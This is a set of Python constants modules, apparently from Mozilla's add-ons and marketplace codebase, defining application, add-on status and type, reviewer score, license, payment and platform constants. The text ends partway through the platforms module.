class MOZILLA(App):
"""Mozilla exists for completeness and historical purposes.
Stats and other modules may reference this for history.
This should NOT be added to APPS.
"""
id = 2
short = 'mz'
shortername = 'mz'
pretty = _(u'Mozilla')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN]
guid = '{86c18b42-e466-45a9-ae7a-9b95ba6f5640}'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class UNKNOWN_APP(App):
"""Placeholder for unknown applications."""
pretty = _(u'Unknown')
class DEVICE_DESKTOP(object):
id = 1
name = _(u'Desktop')
class_name = 'desktop'
api_name = 'desktop'
class DEVICE_MOBILE(object):
id = 2
name = _(u'Firefox Mobile')
class_name = 'android-mobile'
api_name = 'android-mobile'
class DEVICE_TABLET(object):
id = 3
name = _(u'Firefox Tablet')
class_name = 'android-tablet'
api_name = 'android-tablet'
class DEVICE_GAIA(object):
id = 4
name = _(u'Firefox OS')
class_name = 'firefoxos'
api_name = 'firefoxos'
DEVICE_TYPE_LIST = [DEVICE_DESKTOP, DEVICE_MOBILE, DEVICE_TABLET, DEVICE_GAIA]
DEVICE_TYPES = dict((d.id, d) for d in DEVICE_TYPE_LIST)
REVERSE_DEVICE_LOOKUP = dict((d.id, d.api_name) for d in DEVICE_TYPE_LIST)
DEVICE_LOOKUP = dict((d.api_name, d) for d in DEVICE_TYPE_LIST)
# UAs will attempt to match in this order.
APP_DETECT = (ANDROID, MOBILE, THUNDERBIRD, SEAMONKEY, FIREFOX)
APP_USAGE = _apps = (FIREFOX, THUNDERBIRD, ANDROID, MOBILE, SEAMONKEY)
APPS = dict((app.short, app) for app in _apps)
APPS_ALL = dict((app.id, app) for app in _apps + (MOZILLA, SUNBIRD))
APP_IDS = dict((app.id, app) for app in _apps)
APP_GUIDS = dict((app.guid, app) for app in _apps)
APPS_RETIRED = dict([(MOZILLA.short, MOZILLA), (SUNBIRD.short, SUNBIRD)])
APP_TYPE_SUPPORT = {}
for _app in APP_USAGE:
for _type in _app.types:
APP_TYPE_SUPPORT.setdefault(_type, []).append(_app)
for _app in APPS_ALL.values():
_versions = list(getattr(_app, 'exclude_versions', []))
# 99 comes from the hacks we do to make search tools compatible with
# versions (bug 692360).
_versions.append(99)
_app.exclude_versions = tuple(_versions)
del _app, _apps, _type, _versions
########NEW FILE########
__FILENAME__ = base
import re
from datetime import datetime
from tower import ugettext_lazy as _
# Add-on and File statuses.
STATUS_NULL = 0
STATUS_UNREVIEWED = 1
STATUS_PENDING = 2
STATUS_NOMINATED = 3
STATUS_PUBLIC = 4
STATUS_DISABLED = 5
_STATUS_LISTED = 6 # Deprecated. See bug 616242
STATUS_BETA = 7
STATUS_LITE = 8
STATUS_LITE_AND_NOMINATED = 9
STATUS_PURGATORY = 10 # A temporary home; bug 614686
STATUS_DELETED = 11
STATUS_REJECTED = 12 # This applies only to apps (for now)
STATUS_PUBLIC_WAITING = 13 # bug 740967
STATUS_REVIEW_PENDING = 14 # Themes queue, reviewed, needs further action.
STATUS_BLOCKED = 15
STATUS_CHOICES = {
STATUS_NULL: _(u'Incomplete'),
STATUS_UNREVIEWED: _(u'Awaiting Preliminary Review'),
STATUS_PENDING: _(u'Pending approval'),
STATUS_NOMINATED: _(u'Awaiting Full Review'),
STATUS_PUBLIC: _(u'Fully Reviewed'),
STATUS_DISABLED: _(u'Disabled by Mozilla'),
STATUS_BETA: _(u'Beta'),
STATUS_LITE: _(u'Preliminarily Reviewed'),
STATUS_LITE_AND_NOMINATED: _(
u'Preliminarily Reviewed and Awaiting Full Review'),
STATUS_PURGATORY: _(u'Pending a review choice'),
STATUS_DELETED: _(u'Deleted'),
STATUS_REJECTED: _(u'Rejected'),
# Approved, but the developer would like to put it public when they want.
# The need to go to the marketplace and actualy make it public.
STATUS_PUBLIC_WAITING: _(u'Approved but waiting'),
STATUS_REVIEW_PENDING: _(u'Flagged for further review'),
STATUS_BLOCKED: _(u'Blocked'),
}
# Marketplace app status terms.
MKT_STATUS_CHOICES = STATUS_CHOICES.copy()
MKT_STATUS_CHOICES[STATUS_PUBLIC] = _(u'Published')
MKT_STATUS_CHOICES[STATUS_PUBLIC_WAITING] = _(u'Approved but unpublished')
# Marketplace file status terms.
MKT_STATUS_FILE_CHOICES = MKT_STATUS_CHOICES.copy()
MKT_STATUS_FILE_CHOICES[STATUS_DISABLED] = _(u'Obsolete')
# We need to expose nice values that aren't localisable.
STATUS_CHOICES_API = {
STATUS_NULL: 'incomplete',
STATUS_UNREVIEWED: 'unreviewed',
STATUS_PENDING: 'pending',
STATUS_NOMINATED: 'nominated',
STATUS_PUBLIC: 'public',
STATUS_DISABLED: 'disabled',
STATUS_BETA: 'beta',
STATUS_LITE: 'lite',
STATUS_LITE_AND_NOMINATED: 'lite-nominated',
STATUS_PURGATORY: 'purgatory',
STATUS_DELETED: 'deleted',
STATUS_REJECTED: 'rejected',
STATUS_PUBLIC_WAITING: 'waiting',
STATUS_REVIEW_PENDING: 'review-pending',
STATUS_BLOCKED: 'blocked',
}
STATUS_CHOICES_API_LOOKUP = {
'incomplete': STATUS_NULL,
'unreviewed': STATUS_UNREVIEWED,
'pending': STATUS_PENDING,
'nominated': STATUS_NOMINATED,
'public': STATUS_PUBLIC,
'disabled': STATUS_DISABLED,
'beta': STATUS_BETA,
'lite': STATUS_LITE,
'lite-nominated': STATUS_LITE_AND_NOMINATED,
'purgatory': STATUS_PURGATORY,
'deleted': STATUS_DELETED,
'rejected': STATUS_REJECTED,
'waiting': STATUS_PUBLIC_WAITING,
'review-pending': STATUS_REVIEW_PENDING,
'blocked': STATUS_BLOCKED,
}
PUBLIC_IMMEDIATELY = None
# Our MySQL does not store microseconds.
PUBLIC_WAIT = datetime.max.replace(microsecond=0)
REVIEWED_STATUSES = (STATUS_LITE, STATUS_LITE_AND_NOMINATED, STATUS_PUBLIC)
UNREVIEWED_STATUSES = (STATUS_UNREVIEWED, STATUS_PENDING, STATUS_NOMINATED,
STATUS_PURGATORY)
VALID_STATUSES = (STATUS_UNREVIEWED, STATUS_PENDING, STATUS_NOMINATED,
STATUS_PUBLIC, STATUS_BETA, STATUS_LITE,
STATUS_LITE_AND_NOMINATED, STATUS_PURGATORY,
STATUS_PUBLIC_WAITING)
# We don't show addons/versions with UNREVIEWED_STATUS in public.
LISTED_STATUSES = tuple(st for st in VALID_STATUSES
if st not in (STATUS_PENDING, STATUS_PUBLIC_WAITING))
# An add-on in one of these statuses is awaiting a review.
STATUS_UNDER_REVIEW = (STATUS_UNREVIEWED, STATUS_NOMINATED,
STATUS_LITE_AND_NOMINATED)
LITE_STATUSES = (STATUS_LITE, STATUS_LITE_AND_NOMINATED)
MIRROR_STATUSES = (STATUS_PUBLIC,)
# An add-on in one of these statuses can become premium.
PREMIUM_STATUSES = (STATUS_NULL,) + STATUS_UNDER_REVIEW
# Newly submitted apps begin life at this status.
WEBAPPS_UNREVIEWED_STATUS = STATUS_PENDING
# These apps have been approved and are listed; or could be without further
# review
WEBAPPS_APPROVED_STATUSES = (STATUS_PUBLIC, STATUS_PUBLIC_WAITING)
# An app with this status makes its detail page "invisible".
WEBAPPS_UNLISTED_STATUSES = (STATUS_DISABLED, STATUS_PENDING,
STATUS_PUBLIC_WAITING, STATUS_REJECTED)
# The only statuses we use in the marketplace.
MARKET_STATUSES = (STATUS_NULL, STATUS_PENDING, STATUS_PUBLIC, STATUS_DISABLED,
STATUS_DELETED, STATUS_REJECTED, STATUS_PUBLIC_WAITING,
STATUS_BLOCKED)
# These apps shouldn't be considered anymore in mass-emailing etc.
WEBAPPS_EXCLUDED_STATUSES = (STATUS_DISABLED, STATUS_DELETED, STATUS_REJECTED)
# Types of administrative review queues for an add-on:
ADMIN_REVIEW_FULL = 1
ADMIN_REVIEW_PRELIM = 2
ADMIN_REVIEW_TYPES = {
ADMIN_REVIEW_FULL: _(u'Full'),
ADMIN_REVIEW_PRELIM: _(u'Preliminary'),
}
# Add-on author roles.
AUTHOR_ROLE_VIEWER = 1
AUTHOR_ROLE_DEV = 4
AUTHOR_ROLE_OWNER = 5
AUTHOR_ROLE_SUPPORT = 6
AUTHOR_CHOICES = (
(AUTHOR_ROLE_OWNER, _(u'Owner')),
(AUTHOR_ROLE_DEV, _(u'Developer')),
(AUTHOR_ROLE_VIEWER, _(u'Viewer')),
(AUTHOR_ROLE_SUPPORT, _(u'Support')),
)
# Addon types
ADDON_ANY = 0
ADDON_EXTENSION = 1
ADDON_THEME = 2
ADDON_DICT = 3
ADDON_SEARCH = 4
ADDON_LPAPP = 5
ADDON_LPADDON = 6
ADDON_PLUGIN = 7
ADDON_API = 8 # not actually a type but used to identify extensions + themes
ADDON_PERSONA = 9
ADDON_WEBAPP = 11 # Calling this ADDON_* is gross but we've gotta ship code.
# Addon type groupings.
GROUP_TYPE_ADDON = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH, ADDON_LPAPP,
ADDON_LPADDON, ADDON_PLUGIN, ADDON_API]
GROUP_TYPE_THEME = [ADDON_THEME, ADDON_PERSONA]
GROUP_TYPE_WEBAPP = [ADDON_WEBAPP]
# Singular
ADDON_TYPE = {
ADDON_ANY: _(u'Any'),
ADDON_EXTENSION: _(u'Extension'),
ADDON_THEME: _(u'Complete Theme'),
ADDON_DICT: _(u'Dictionary'),
ADDON_SEARCH: _(u'Search Engine'),
ADDON_PLUGIN: _(u'Plugin'),
ADDON_LPAPP: _(u'Language Pack (Application)'),
ADDON_PERSONA: _(u'Theme'),
ADDON_WEBAPP: _(u'App'),
}
# Plural
ADDON_TYPES = {
ADDON_ANY: _(u'Any'),
ADDON_EXTENSION: _(u'Extensions'),
ADDON_THEME: _(u'Complete Themes'),
ADDON_DICT: _(u'Dictionaries'),
ADDON_SEARCH: _(u'Search Tools'),
ADDON_PLUGIN: _(u'Plugins'),
ADDON_LPAPP: _(u'Language Packs (Application)'),
ADDON_PERSONA: _(u'Themes'),
ADDON_WEBAPP: _(u'Apps'),
}
# Searchable Add-on Types
ADDON_SEARCH_TYPES = [
ADDON_ANY,
ADDON_EXTENSION,
ADDON_THEME,
ADDON_DICT,
ADDON_SEARCH,
ADDON_LPAPP,
ADDON_PERSONA,
]
ADDON_ADMIN_SEARCH_TYPES = ADDON_SEARCH_TYPES + [ADDON_PLUGIN]
MARKETPLACE_TYPES = [ADDON_WEBAPP]
# ADDON_WEBAPP Types
ADDON_WEBAPP_HOSTED = 1
ADDON_WEBAPP_PACKAGED = 2
ADDON_WEBAPP_PRIVILEGED = 3
ADDON_WEBAPP_TYPES = {
ADDON_WEBAPP_HOSTED: 'hosted',
ADDON_WEBAPP_PACKAGED: 'packaged',
ADDON_WEBAPP_PRIVILEGED: 'privileged',
}
ADDON_WEBAPP_TYPES_LOOKUP = dict((v, k) for k, v in ADDON_WEBAPP_TYPES.items())
# Icons
ADDON_ICONS = {
ADDON_ANY: 'default-addon.png',
ADDON_THEME: 'default-theme.png',
}
# We use these slugs in browse page urls.
ADDON_SLUGS = {
ADDON_EXTENSION: 'extensions',
ADDON_THEME: 'themes',
ADDON_DICT: 'language-tools',
ADDON_LPAPP: 'language-tools',
ADDON_PERSONA: 'personas',
ADDON_SEARCH: 'search-tools',
ADDON_WEBAPP: 'apps',
}
# These are used in the update API.
ADDON_SLUGS_UPDATE = {
ADDON_EXTENSION: 'extension',
ADDON_THEME: 'theme',
ADDON_DICT: 'extension',
ADDON_SEARCH: 'search',
ADDON_LPAPP: 'item',
ADDON_LPADDON: 'extension',
ADDON_PERSONA: 'background-theme',
ADDON_PLUGIN: 'plugin',
ADDON_WEBAPP: 'app',
}
# A slug to ID map for the search API. Included are all ADDON_TYPES that are
# found in ADDON_SEARCH_TYPES.
ADDON_SEARCH_SLUGS = {
'any': ADDON_ANY,
'extension': ADDON_EXTENSION,
'theme': ADDON_THEME,
'dictionary': ADDON_DICT,
'search': ADDON_SEARCH,
'language': ADDON_LPAPP,
'persona': ADDON_PERSONA,
}
# Marketplace search API addon types.
MKT_ADDON_TYPES_API = {
'app': ADDON_WEBAPP,
}
ADDON_FREE = 0
ADDON_PREMIUM = 1
ADDON_PREMIUM_INAPP = 2
ADDON_FREE_INAPP = 3
# The addon will have payments, but they aren't using our payment system.
ADDON_OTHER_INAPP = 4
ADDON_PREMIUM_TYPES = {
ADDON_FREE: _('Free'),
ADDON_PREMIUM: _('Premium'),
ADDON_PREMIUM_INAPP: _('Premium with in-app payments'),
ADDON_FREE_INAPP: _('Free with in-app payments'),
ADDON_OTHER_INAPP: _("I'll use my own system for in-app payments")
}
# Non-locale versions for the API.
ADDON_PREMIUM_API = {
ADDON_FREE: 'free',
ADDON_PREMIUM: 'premium',
ADDON_PREMIUM_INAPP: 'premium-inapp',
ADDON_FREE_INAPP: 'free-inapp',
ADDON_OTHER_INAPP: 'other',
}
ADDON_PREMIUM_API_LOOKUP = dict((v, k) for k, v in ADDON_PREMIUM_API.items())
# Apps that require some sort of payment prior to installing.
ADDON_PREMIUMS = (ADDON_PREMIUM, ADDON_PREMIUM_INAPP)
# Apps that do *not* require a payment prior to installing.
ADDON_FREES = (ADDON_FREE, ADDON_FREE_INAPP, ADDON_OTHER_INAPP)
ADDON_INAPPS = (ADDON_PREMIUM_INAPP, ADDON_FREE_INAPP)
ADDON_BECOME_PREMIUM = (ADDON_EXTENSION, ADDON_THEME, ADDON_DICT,
ADDON_LPAPP, ADDON_WEBAPP)
ADDON_HAS_PAYMENTS = (ADDON_FREE_INAPP, ADDON_PREMIUM, ADDON_PREMIUM_INAPP)
# Edit addon information
MAX_TAGS = 20
MIN_TAG_LENGTH = 2
MAX_CATEGORIES = 2
# Icon upload sizes
ADDON_ICON_SIZES = [32, 48, 64, 128, 256, 512]
# Preview upload sizes [thumb, full]
ADDON_PREVIEW_SIZES = [(200, 150), (700, 525)]
# Accepted image MIME-types
IMG_TYPES = ('image/png', 'image/jpeg', 'image/jpg')
VIDEO_TYPES = ('video/webm',)
# These types don't maintain app compatibility in the db. Instead, we look at
# APP.types and APP_TYPE_SUPPORT to figure out where they are compatible.
NO_COMPAT = (ADDON_SEARCH, ADDON_PERSONA)
HAS_COMPAT = dict((t, t not in NO_COMPAT) for t in ADDON_TYPES)
# Contributions
CONTRIB_NONE = 0
CONTRIB_PASSIVE = 1
CONTRIB_AFTER = 2
CONTRIB_ROADBLOCK = 3
CONTRIB_CHOICES = (
(CONTRIB_PASSIVE,
_(u"Only ask on this add-on's page and developer profile")),
(CONTRIB_AFTER, _(u"Ask after users start downloading this add-on")),
(CONTRIB_ROADBLOCK, _(u"Ask before users can download this add-on")),
)
# Collections.
COLLECTION_NORMAL = 0
COLLECTION_SYNCHRONIZED = 1
COLLECTION_FEATURED = 2
COLLECTION_RECOMMENDED = 3
COLLECTION_FAVORITES = 4
COLLECTION_MOBILE = 5
COLLECTION_ANONYMOUS = 6
COLLECTIONS_NO_CONTRIB = (COLLECTION_SYNCHRONIZED, COLLECTION_FAVORITES)
COLLECTION_SPECIAL_SLUGS = {
COLLECTION_MOBILE: 'mobile',
COLLECTION_FAVORITES: 'favorites',
}
COLLECTION_CHOICES = {
COLLECTION_NORMAL: 'Normal',
COLLECTION_SYNCHRONIZED: 'Synchronized',
COLLECTION_FEATURED: 'Featured',
COLLECTION_RECOMMENDED: 'Generated Recommendations',
COLLECTION_FAVORITES: 'Favorites',
COLLECTION_MOBILE: 'Mobile',
COLLECTION_ANONYMOUS: 'Anonymous',
}
COLLECTION_SEARCH_CHOICES = [
COLLECTION_NORMAL,
COLLECTION_FEATURED,
COLLECTION_RECOMMENDED,
COLLECTION_MOBILE,
COLLECTION_ANONYMOUS,
]
COLLECTION_ROLE_PUBLISHER = 0
COLLECTION_ROLE_ADMIN = 1
COLLECTION_AUTHOR_CHOICES = {
COLLECTION_ROLE_PUBLISHER: 'Publisher',
COLLECTION_ROLE_ADMIN: 'Admin',
}
# Contributions.
FOUNDATION_ORG = 1 # The charities.id of the Mozilla Foundation.
VERSION_BETA = re.compile('(a|alpha|b|beta|pre|rc)\d*$')
VERSION_SEARCH = re.compile('\.(\d+)$')
# Editor Tools
EDITOR_VIEWING_INTERVAL = 8 # How often we ping for "who's watching?"
# Types of Canned Responses for reviewer tools.
CANNED_RESPONSE_ADDON = 1
CANNED_RESPONSE_APP = 2
CANNED_RESPONSE_CHOICES = {
CANNED_RESPONSE_ADDON: _('Add-on'),
CANNED_RESPONSE_APP: _('App'),
}
# For use in urls.
ADDON_ID = r"""(?P<addon_id>[^/<>"']+)"""
ADDON_UUID = r'(?P<uuid>[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12})'
APP_SLUG = r"""(?P<app_slug>[^/<>"']+)"""
# Reviewer Incentive Scores.
# Note: Don't change these since they're used as keys in the database.
REVIEWED_MANUAL = 0
REVIEWED_ADDON_FULL = 10
REVIEWED_ADDON_PRELIM = 11
REVIEWED_ADDON_UPDATE = 12
REVIEWED_DICT_FULL = 20
REVIEWED_DICT_PRELIM = 21
REVIEWED_DICT_UPDATE = 22
REVIEWED_LP_FULL = 30
REVIEWED_LP_PRELIM = 31
REVIEWED_LP_UPDATE = 32
REVIEWED_PERSONA = 40
# TODO: Leaving room for persona points based on queue.
REVIEWED_SEARCH_FULL = 50
REVIEWED_SEARCH_PRELIM = 51
REVIEWED_SEARCH_UPDATE = 52
REVIEWED_THEME_FULL = 60
REVIEWED_THEME_PRELIM = 61
REVIEWED_THEME_UPDATE = 62
REVIEWED_WEBAPP_HOSTED = 70
REVIEWED_WEBAPP_PACKAGED = 71
REVIEWED_WEBAPP_REREVIEW = 72
REVIEWED_WEBAPP_UPDATE = 73
REVIEWED_ADDON_REVIEW = 80
REVIEWED_APP_REVIEW = 81
REVIEWED_CHOICES = {
REVIEWED_MANUAL: _('Manual Reviewer Points'),
REVIEWED_ADDON_FULL: _('Full Add-on Review'),
REVIEWED_ADDON_PRELIM: _('Preliminary Add-on Review'),
REVIEWED_ADDON_UPDATE: _('Updated Add-on Review'),
REVIEWED_DICT_FULL: _('Full Dictionary Review'),
REVIEWED_DICT_PRELIM: _('Preliminary Dictionary Review'),
REVIEWED_DICT_UPDATE: _('Updated Dictionary Review'),
REVIEWED_LP_FULL: _('Full Language Pack Review'),
REVIEWED_LP_PRELIM: _('Preliminary Language Pack Review'),
REVIEWED_LP_UPDATE: _('Updated Language Pack Review'),
REVIEWED_PERSONA: _('Theme Review'),
REVIEWED_SEARCH_FULL: _('Full Search Provider Review'),
REVIEWED_SEARCH_PRELIM: _('Preliminary Search Provider Review'),
REVIEWED_SEARCH_UPDATE: _('Updated Search Provider Review'),
REVIEWED_THEME_FULL: _('Complete Theme Review'),
REVIEWED_THEME_PRELIM: _('Preliminary Complete Theme Review'),
REVIEWED_THEME_UPDATE: _('Updated Complete Theme Review'),
REVIEWED_WEBAPP_HOSTED: _('Web App Review'),
REVIEWED_WEBAPP_PACKAGED: _('Packaged App Review'),
REVIEWED_WEBAPP_REREVIEW: _('Web App Re-review'),
REVIEWED_WEBAPP_UPDATE: _('Updated Packaged App Review'),
REVIEWED_ADDON_REVIEW: _('Moderated Addon Review'),
REVIEWED_APP_REVIEW: _('Moderated App Review'),
}
REVIEWED_SCORES = {
REVIEWED_MANUAL: 0,
REVIEWED_ADDON_FULL: 120,
REVIEWED_ADDON_PRELIM: 60,
REVIEWED_ADDON_UPDATE: 80,
REVIEWED_DICT_FULL: 60,
REVIEWED_DICT_PRELIM: 20,
REVIEWED_DICT_UPDATE: 60,
REVIEWED_LP_FULL: 60,
REVIEWED_LP_PRELIM: 20,
REVIEWED_LP_UPDATE: 60,
REVIEWED_PERSONA: 5,
REVIEWED_SEARCH_FULL: 30,
REVIEWED_SEARCH_PRELIM: 10,
REVIEWED_SEARCH_UPDATE: 30,
REVIEWED_THEME_FULL: 80,
REVIEWED_THEME_PRELIM: 40,
REVIEWED_THEME_UPDATE: 80,
REVIEWED_WEBAPP_HOSTED: 60,
REVIEWED_WEBAPP_PACKAGED: 120,
REVIEWED_WEBAPP_REREVIEW: 30,
REVIEWED_WEBAPP_UPDATE: 80,
REVIEWED_ADDON_REVIEW: 1,
REVIEWED_APP_REVIEW: 1,
}
REVIEWED_AMO = (
REVIEWED_ADDON_FULL,
REVIEWED_ADDON_PRELIM,
REVIEWED_ADDON_UPDATE,
REVIEWED_DICT_FULL,
REVIEWED_DICT_PRELIM,
REVIEWED_DICT_UPDATE,
REVIEWED_LP_FULL,
REVIEWED_LP_PRELIM,
REVIEWED_LP_UPDATE,
REVIEWED_SEARCH_FULL,
REVIEWED_SEARCH_PRELIM,
REVIEWED_SEARCH_UPDATE,
REVIEWED_THEME_FULL,
REVIEWED_THEME_PRELIM,
REVIEWED_THEME_UPDATE,
REVIEWED_ADDON_REVIEW,
)
REVIEWED_MARKETPLACE = (
REVIEWED_WEBAPP_HOSTED,
REVIEWED_WEBAPP_PACKAGED,
REVIEWED_WEBAPP_REREVIEW,
REVIEWED_WEBAPP_UPDATE,
REVIEWED_APP_REVIEW,
)
REVIEWED_LEVELS = [
{'name': _('Level 1'), 'points': 2160},
{'name': _('Level 2'), 'points': 4320},
{'name': _('Level 3'), 'points': 8700},
{'name': _('Level 4'), 'points': 21000},
{'name': _('Level 5'), 'points': 45000},
{'name': _('Level 6'), 'points': 96000},
]
# Login credential source. We'll also include the site source in that.
# All the old existing AMO users and anyone before we started tracking this.
LOGIN_SOURCE_UNKNOWN = 0
# Most likely everyone who signed up for the marketplace.
LOGIN_SOURCE_BROWSERID = 1
# Everyone who signed up for the marketplace using BrowserID.
LOGIN_SOURCE_MMO_BROWSERID = 2
# Everyone who signed up for AMO once it uses BrowserID.
LOGIN_SOURCE_AMO_BROWSERID = 3
# These are logins that use BrowserID.
LOGIN_SOURCE_BROWSERIDS = [LOGIN_SOURCE_BROWSERID, LOGIN_SOURCE_AMO_BROWSERID,
LOGIN_SOURCE_MMO_BROWSERID]
########NEW FILE########
__FILENAME__ = licenses
from tower import ugettext_lazy as _lazy
# Built-in Licenses
class _LicenseBase(object):
    """Base class for built-in licenses."""
    icons = ''  # CSS classes. See zamboni.css for a list.
    # False only for the all-rights-reserved license below.
    some_rights = True
class LICENSE_COPYRIGHT(_LicenseBase):
id = 1
name = _lazy(u'All Rights Reserved')
icons = 'copyr'
some_rights = False
url = None
class LICENSE_CC_BY(_LicenseBase):
id = 2
name = _lazy(u'Creative Commons Attribution 3.0')
url = 'http://creativecommons.org/licenses/by/3.0/'
icons = 'cc-attrib'
class LICENSE_CC_BY_NC(_LicenseBase):
id = 3
icons = 'cc-attrib cc-noncom'
name = _lazy(u'Creative Commons Attribution-NonCommercial 3.0')
url = 'http://creativecommons.org/licenses/by-nc/3.0/'
class LICENSE_CC_BY_NC_ND(_LicenseBase):
id = 4
icons = 'cc-attrib cc-noncom cc-noderiv'
name = _lazy(u'Creative Commons Attribution-NonCommercial-NoDerivs 3.0')
url = 'http://creativecommons.org/licenses/by-nc-nd/3.0/'
class LICENSE_CC_BY_NC_SA(_LicenseBase):
id = 5
icons = 'cc-attrib cc-noncom cc-share'
name = _lazy(u'Creative Commons Attribution-NonCommercial-Share Alike 3.0')
url = 'http://creativecommons.org/licenses/by-nc-sa/3.0/'
class LICENSE_CC_BY_ND(_LicenseBase):
id = 6
icons = 'cc-attrib cc-noderiv'
name = _lazy(u'Creative Commons Attribution-NoDerivs 3.0')
url = 'http://creativecommons.org/licenses/by-nd/3.0/'
class LICENSE_CC_BY_SA(_LicenseBase):
id = 7
icons = 'cc-attrib cc-share'
name = _lazy(u'Creative Commons Attribution-ShareAlike 3.0')
url = 'http://creativecommons.org/licenses/by-sa/3.0/'
PERSONA_LICENSES = (LICENSE_COPYRIGHT, LICENSE_CC_BY, LICENSE_CC_BY_NC,
LICENSE_CC_BY_NC_ND, LICENSE_CC_BY_NC_SA, LICENSE_CC_BY_ND,
LICENSE_CC_BY_SA)
PERSONA_LICENSES_CHOICES = [(l.id, l) for l in PERSONA_LICENSES]
PERSONA_LICENSES_IDS = dict(PERSONA_LICENSES_CHOICES)
########NEW FILE########
__FILENAME__ = payments
# -*- coding: utf-8 -*-
from tower import ugettext_lazy as _
from lib.constants import ALL_CURRENCIES
# Source, PayPal docs, PP_AdaptivePayments.PDF
PAYPAL_CURRENCIES = ['AUD', 'BRL', 'CAD', 'CHF', 'CZK', 'DKK', 'EUR', 'GBP',
                     'HKD', 'HUF', 'ILS', 'JPY', 'MXN', 'MYR', 'NOK', 'NZD',
                     'PHP', 'PLN', 'SEK', 'SGD', 'THB', 'TWD', 'USD']
# Re-bound as a {code: display name} dict restricted to the codes above.
PAYPAL_CURRENCIES = dict((k, ALL_CURRENCIES[k]) for k in PAYPAL_CURRENCIES)

# Locale -> default currency for that locale.
# TODO(Kumar) bug 768223. Need to find a more complete list for this.
# This is just a sample.
LOCALE_CURRENCY = {
    'en_US': 'USD',
    'en_CA': 'CAD',
    'it': 'EUR',
    'fr': 'EUR',
    'pt_BR': 'BRL',
}
CURRENCY_DEFAULT = 'USD'

# Contribution type constants. NOTE(review): these look like persisted ids
# (deprecated ones below warn against re-use) -- don't renumber.
CONTRIB_VOLUNTARY = 0
CONTRIB_PURCHASE = 1
CONTRIB_REFUND = 2
CONTRIB_CHARGEBACK = 3
# We've started a transaction and we need to wait to see what
# paypal will return.
CONTRIB_PENDING = 4
# The following in-app contribution types are deprecated. Avoid re-using
# these ID numbers in new types.
_CONTRIB_INAPP_PENDING = 5
_CONTRIB_INAPP = 6
# The app was temporarily free. This is so we can record it in
# the purchase table, even though there isn't a contribution.
CONTRIB_NO_CHARGE = 7
CONTRIB_OTHER = 99

# Localized labels for the contribution types above.
CONTRIB_TYPES = {
    CONTRIB_CHARGEBACK: _('Chargeback'),
    CONTRIB_OTHER: _('Other'),
    CONTRIB_PURCHASE: _('Purchase'),
    CONTRIB_REFUND: _('Refund'),
    CONTRIB_VOLUNTARY: _('Voluntary'),
}
# Subset of the labels used for Marketplace transactions.
MKT_TRANSACTION_CONTRIB_TYPES = {
    CONTRIB_CHARGEBACK: _('Chargeback'),
    CONTRIB_PURCHASE: _('Purchase'),
    CONTRIB_REFUND: _('Refund'),
}
CONTRIB_TYPE_DEFAULT = CONTRIB_VOLUNTARY

# Refund status constants.
REFUND_PENDING = 0  # Just to irritate you I didn't call this REFUND_REQUESTED.
REFUND_APPROVED = 1
REFUND_APPROVED_INSTANT = 2
REFUND_DECLINED = 3
REFUND_FAILED = 4

REFUND_STATUSES = {
    # Refund pending (purchase > 30 min ago).
    REFUND_PENDING: _('Pending'),
    # Approved manually by developer.
    REFUND_APPROVED: _('Approved'),
    # Instant refund (purchase <= 30 min ago).
    REFUND_APPROVED_INSTANT: _('Approved Instantly'),
    # Declined manually by developer.
    REFUND_DECLINED: _('Declined'),
    # Refund didn't work somehow.
    REFUND_FAILED: _('Failed'),
}

# User-facing messages keyed by PayPal payment status code.
PAYMENT_DETAILS_ERROR = {
    'CREATED': _('The payment was received, but not completed.'),
    'INCOMPLETE': _('The payment was received, but not completed.'),
    'ERROR': _('The payment failed.'),
    'REVERSALERROR': _('The reversal failed.'),
    'PENDING': _('The payment was received, but not completed '
                 'and is awaiting processing.'),
}

# Payment provider constants and their slugs.
PROVIDER_PAYPAL = 0
PROVIDER_BANGO = 1
PROVIDER_REFERENCE = 2
PROVIDER_BOKU = 3

PROVIDER_CHOICES = (
    (PROVIDER_PAYPAL, 'paypal'),
    (PROVIDER_BANGO, 'bango'),
    (PROVIDER_REFERENCE, 'reference'),
    (PROVIDER_BOKU, 'boku')
)
# Reverse map: provider slug -> provider id.
PROVIDER_LOOKUP = dict([(v, k) for k, v in PROVIDER_CHOICES])

CARRIER_CHOICES = ()

# Payment methods accepted by the PriceCurrency..
#
# If we ever go beyond these two payment methods, we might need to do
# something more scalable.
PAYMENT_METHOD_OPERATOR = 0
PAYMENT_METHOD_CARD = 1
PAYMENT_METHOD_ALL = 2
PAYMENT_METHOD_CHOICES = (
    (PAYMENT_METHOD_OPERATOR, 'operator'),
    (PAYMENT_METHOD_CARD, 'card'),
    (PAYMENT_METHOD_ALL, 'operator+card')
)
########NEW FILE########
__FILENAME__ = platforms
from django.utils.datastructures import SortedDict
from tower import ugettext_lazy as _
from . import applications
# Platforms
# Each class below is an enum-like namespace describing one platform:
#   id        -- numeric identifier (don't renumber; used in the maps below)
#   name      -- localized display name
#   shortname -- slug used for lookups (see PLATFORM_DICT below)
#   api_name  -- name used by the API (not translated)
class PLATFORM_ANY:
    id = 0
    name = _(u'Any')
    shortname = 'any'
    # API name is not translated
    api_name = u'ALL'


class PLATFORM_ALL:
    id = 1
    name = _(u'All Platforms')
    shortname = 'all'
    api_name = u'ALL'


class PLATFORM_ALL_MOBILE:
    id = 9
    name = _(u'All Mobile Platforms')
    shortname = 'allmobile'
    api_name = u'ALL_mobile'


class PLATFORM_LINUX:
    id = 2
    name = _(u'Linux')
    shortname = 'linux'
    api_name = u'Linux'


class PLATFORM_MAC:
    id = 3
    name = _(u'Mac OS X')
    shortname = 'mac'
    api_name = u'Darwin'


class PLATFORM_BSD:
    id = 4
    name = _(u'BSD')
    shortname = 'bsd'
    api_name = u'BSD_OS'


class PLATFORM_WIN:
    id = 5
    name = _(u'Windows')
    shortname = 'windows'
    api_name = u'WINNT'


class PLATFORM_SUN:
    id = 6
    name = _(u'Solaris')
    shortname = 'solaris'
    api_name = 'SunOS'


class PLATFORM_ANDROID:
    id = 7
    name = _(u'Android')
    shortname = u'android'
    api_name = u'Android'


class PLATFORM_MAEMO:
    id = 8
    name = _(u'Maemo')
    shortname = u'maemo'
    api_name = u'Maemo'
# Contains historic platforms that are no longer supported.
# These exist so that legacy files can still be edited.
